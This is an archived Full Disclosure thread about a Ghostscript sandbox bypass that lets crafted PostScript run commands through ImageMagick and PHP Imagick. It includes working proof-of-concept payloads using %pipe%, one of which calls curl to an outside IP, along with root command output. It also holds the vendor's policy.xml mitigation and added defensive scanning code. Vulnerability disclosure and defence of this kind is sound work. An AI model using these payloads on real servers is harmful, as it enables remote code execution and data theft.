Full Disclosure mailing list archives

Ghostscript sandbox bypass leads ImageMagick to remote code execution


From: redrain root <rootredrain () gmail com>
Date: Wed, 19 Oct 2016 15:37:32 +0800

Recently I noticed Tavis Ormandy reporting a vulnerability in Ghostscript:
-dSAFER mode could be ignored and lead to code execution; however, no one
has exploited it in an application. Here is a simple discussion and exploit
of it.



Author: redrain, yu.hong () chaitin com
Date: 2016-10-17
Version: Ghostscript version > 1.6
         ImageMagick (or other app) all versions
Vendor Notified: 2016-10-18

ImageMagick allows files to be processed with external libraries (delegates).
Here are some delegates:

<delegate decode="eps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
&quot;-sDEVICE=pdfwrite&quot; &quot;-sOutputFile=%o&quot;
&quot;-f%i&quot;"/>
<delegate decode="eps" encode="ps" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=ps2write&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="ps" encode="eps" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=epswrite&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>
<delegate decode="ps" encode="pdf" mode="bi" command="&quot;gs&quot; -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pdfwrite&quot;
&quot;-sOutputFile=%o&quot; &quot;-f%i&quot;"/>

All of these delegates use Ghostscript (gs) to handle "pdf to eps",
"ps to eps", "eps to ps" and "pdf to ps", and all of them pass the parameter
-f; this parameter can lead Ghostscript to execute any command.

Ghostscript version: > 9.16
For example, the latest Ubuntu 16.10 Ghostscript package version is 9.19;
any user who uses ImageMagick on this system is vulnerable.

cat rr.pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit

convert rr.pdf eps:rr
root@redrain-Parallels-Virtual-Platform:/tmp# convert rr.pdf eps:rr
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
convert: no images defined `eps:rr' @
error/convert.c/ConvertImageCommand/3253.

And there is an interesting thing: ImageMagick automatically recognizes the
file's real format from the file header and uses the corresponding delegate
to handle it.

It also affects Imagick.

PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

$exploit = <<<EOF
%!PS

currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)

.putdeviceparams

quit
EOF;

$thumb = new Imagick();
$thumb->readImageBlob($exploit);

Regards,
redrain
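The post above makes two points a defender can act on: ImageMagick picks the gs delegate from the file header, not the extension, and the PoC depends on the %pipe% pseudo-device written through OutputICCProfile/.putdeviceparams. The following upload gate is an added example (not code from the post or from ImageMagick) that sniffs the header the same way and refuses PostScript/PDF carrying those constructs; the sample blobs are constructed and the command in the PoC shape is replaced by a placeholder.

```python
import re
from typing import List, Tuple

# Header signatures that make ImageMagick hand a file to the gs delegate.
# As the post notes, the real format comes from the header, so an extension
# filter alone does not keep PostScript out of the PS/EPS/PDF delegates.
MAGIC = {b"%!PS": "ps", b"%PDF-": "pdf"}
EXPECTED_EXT = {"ps": (".ps", ".eps"), "pdf": (".pdf",)}

# Constructs the rr.pdf PoC in this thread relies on: the %pipe% pseudo-device
# and a device-parameter write of OutputICCProfile through .putdeviceparams.
SUSPICIOUS = [
    (re.compile(rb"%pipe%", re.IGNORECASE), "%pipe% pseudo-device"),
    (re.compile(rb"/OutputICCProfile\b"), "OutputICCProfile override"),
    (re.compile(rb"\.putdeviceparams\b"), ".putdeviceparams call"),
]

def sniff_format(data: bytes) -> str:
    """Return 'ps', 'pdf' or 'other' from the leading bytes only."""
    for magic, fmt in MAGIC.items():
        if data.startswith(magic):
            return fmt
    return "other"

def scan_blob(data: bytes, claimed_name: str = "") -> Tuple[bool, List[str]]:
    """Decide whether an upload may reach the gs delegate: (allow, reasons)."""
    reasons: List[str] = []
    fmt = sniff_format(data)
    if fmt == "other":
        return True, reasons          # not something gs would be asked to render
    if claimed_name and not claimed_name.lower().endswith(EXPECTED_EXT[fmt]):
        reasons.append("%s content in file named %s" % (fmt, claimed_name))
    for pattern, label in SUSPICIOUS:
        if pattern.search(data):
            reasons.append(label)
    return not reasons, reasons

# Constructed samples: the PoC shape from the thread with the command replaced
# by a placeholder, a benign PostScript page, and a PNG header.
SAMPLE_POC = (b"%!PS\ncurrentdevice null true mark "
              b"/OutputICCProfile (%pipe%PLACEHOLDER)\n.putdeviceparams\nquit\n")
SAMPLE_BENIGN_PS = b"%!PS\n72 72 moveto (hello) show\nshowpage\n"
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8

if __name__ == "__main__":
    for name, blob in [("rr.pdf", SAMPLE_POC), ("ok.ps", SAMPLE_BENIGN_PS),
                       ("img.png", SAMPLE_PNG)]:
        print(name, scan_blob(blob, name))
```

The rr.pdf sample is flagged both for its PostScript header under a .pdf name and for each of the three constructs, which is the point: name-based filtering would have let it through.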



---------- Forwarded message ----------
From: redrain root <rootredrain () gmail com>
Date: 2016-10-19 1:47 GMT+08:00
Subject: Fwd: Security Issue
To: chris.liddell () artifex com


Hi Chris,
there is a vulnerability in Ghostscript; the ImageMagick security team
suggested I post it to your group.

Regards,
redrain



Forwarded conversation
Subject: Re: Security Issue
------------------------

From: <vir.prudens.non.contra.ventum.mingit () imagemagick org>
Date: 2016-10-18 19:16 GMT+08:00
To: rootredrain () gmail com


We've seen this Ghostscript issue before and it was rerouted to the
Ghostscript maintainers.  And it looks like the flaw in Ghostscript might be
fixed. We're using Ghostscript 9.20 and we get:

'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ'
  ./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
/dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ' -c
showpage
  ./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
/dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCommand/3253.


Until Ghostscript is upgraded under Ubuntu with the Ghostscript security
patch, you can add a security policy to ImageMagick's policy.xml to prevent
PostScript / PDF from being rendered:

  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />

Now we get

convert -verbose rr.pdf eps:rr
convert: not authorized `rr.pdf' @ error/constitute.c/ReadImage/416.
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCommand/3253.

The ImageMagick Security Team
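A quick way to confirm that the three policy lines recommended above are actually in force, as an added example (not the ImageMagick security team's code): parse the policymap and report any of PS, EPS or PDF that lacks rights="none". The two policy fragments are constructed for the example, not copied from a real installation.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Coders the ImageMagick security team's reply disables (rights="none") so
# that no PostScript or PDF input is handed to the Ghostscript delegate.
REQUIRED_BLOCKED = ("PS", "EPS", "PDF")

def coder_rights(policy_xml: str) -> Dict[str, str]:
    """Map every coder-domain pattern in a policymap to its rights value."""
    root = ET.fromstring(policy_xml)
    return {
        p.get("pattern", "").upper(): p.get("rights", "").lower()
        for p in root.iter("policy")
        if p.get("domain") == "coder"
    }

def missing_policies(policy_xml: str) -> List[str]:
    """Coders from REQUIRED_BLOCKED that are absent or not set to rights="none"."""
    rights = coder_rights(policy_xml)
    return [c for c in REQUIRED_BLOCKED if rights.get(c) != "none"]

def policy_blocks_ghostscript(policy_xml: str) -> bool:
    return not missing_policies(policy_xml)

# Constructed policymap fragments, not a real installation's policy.xml.
UNHARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
</policymap>"""

if __name__ == "__main__":
    for label, xml in (("unhardened", UNHARDENED_POLICY), ("hardened", HARDENED_POLICY)):
        gaps = missing_policies(xml)
        print(label, "OK" if not gaps else "still allows: " + ", ".join(gaps))
```

To check a live system, read the installed policy.xml (usually /etc/ImageMagick-6/policy.xml on Debian and Ubuntu) and pass its contents to missing_policies(); an entry with rights="read" counts as a gap, since the coder could still be used to render the file.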

----------
From: redrain root <rootredrain () gmail com>
Date: 2016-10-18 19:41 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit () imagemagick org



root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64  -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
 -sDEVICE=pdfwrite   -sOutputFile=1.eps   -f /var/www/html/1.pdf
uid=0(root) gid=0(root) groups=0(root)
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
profile failed
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
--version
9.20
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64#


Regards,
redrain



----------
From: redrain root <rootredrain () gmail com>
Date: 2016-10-18 19:45 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit () imagemagick org


I guess you used the old gs version?
and this vulnerability affects versions > 9.16

Regards,
redrain





----------
From: <vir.prudens.non.contra.ventum.mingit () imagemagick org>
Date: 2016-10-18 19:50 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit () imagemagick org,
rootredrain () gmail com


redrain root <rootredrain () gmail com> wrote:

I guess you used the old gs version?
and this vulnerability affects versions > 9.16

We're using Ghostscript 9.20 which is > 9.16.

----------
From: redrain root <rootredrain () gmail com>
Date: 2016-10-18 20:11 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit () imagemagick org


You can use

tar zxf a.tar.gz
cd sb
./a.sh

then the command returns "uid=0(root) gid=0(root) groups=0(root)"
Regards,
redrain



----------
From: <vir.prudens.non.contra.ventum.mingit () imagemagick org>
Date: 2016-10-18 21:08 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit () imagemagick org,
rootredrain () gmail com


redrain root <rootredrain () gmail com> wrote:


root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64  -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
 -sDEVICE=pdfwrite   -sOutputFile=1.eps   -f /var/www/html/1.pdf
uid=0(root) gid=0(root) groups=0(root)
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
profile failed
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
--version
9.20
root@ubuntu:/opt/ghostscript-9.20-linux-x86_64#


It's likely the patch was against Ghostscript in Fedora 25.  As mentioned,
in the meantime add a security policy to ImageMagick to prevent the use
of Ghostscript.

----------
From: redrain root <rootredrain () gmail com>
Date: 2016-10-18 21:19 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit () imagemagick org


The latest Ghostscript is downloaded from
http://www.ghostscript.com/download/gsdnld.html and I'm trying to reproduce
this vuln in different distros; it works.

So do you consider this a valid vulnerability?
And another interesting thing is I tried to exploit it in Imagick, and it
looks to work well.

PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

$exploit = <<<EOF
%!PS

currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)

.putdeviceparams

quit
EOF;

$thumb = new Imagick();
$thumb->readImageBlob($exploit);

Regards,
redrain



----------
From: redrain root <rootredrain () gmail com>
Date: 2016-10-18 21:38 GMT+08:00
To: 332746458 () qq com



Regards,
redrain



----------
From: <vir.prudens.non.contra.ventum.mingit () imagemagick org>
Date: 2016-10-18 22:21 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit () imagemagick org,
rootredrain () gmail com


redrain root <rootredrain () gmail com> wrote:

the latest Ghostscript is downloaded from
http://www.ghostscript.com/download/gsdnld.html and I'm trying to
reproduce

This appears to be a Ghostscript vulnerability.  Post to the Ghostscript
developers group.  We can't fix a Ghostscript vulnerability and our only
suggestion is an ImageMagick security policy that prevents the use of
Ghostscript until the vulnerability is fixed in Ghostscript.

Attachment: a.tar.gz

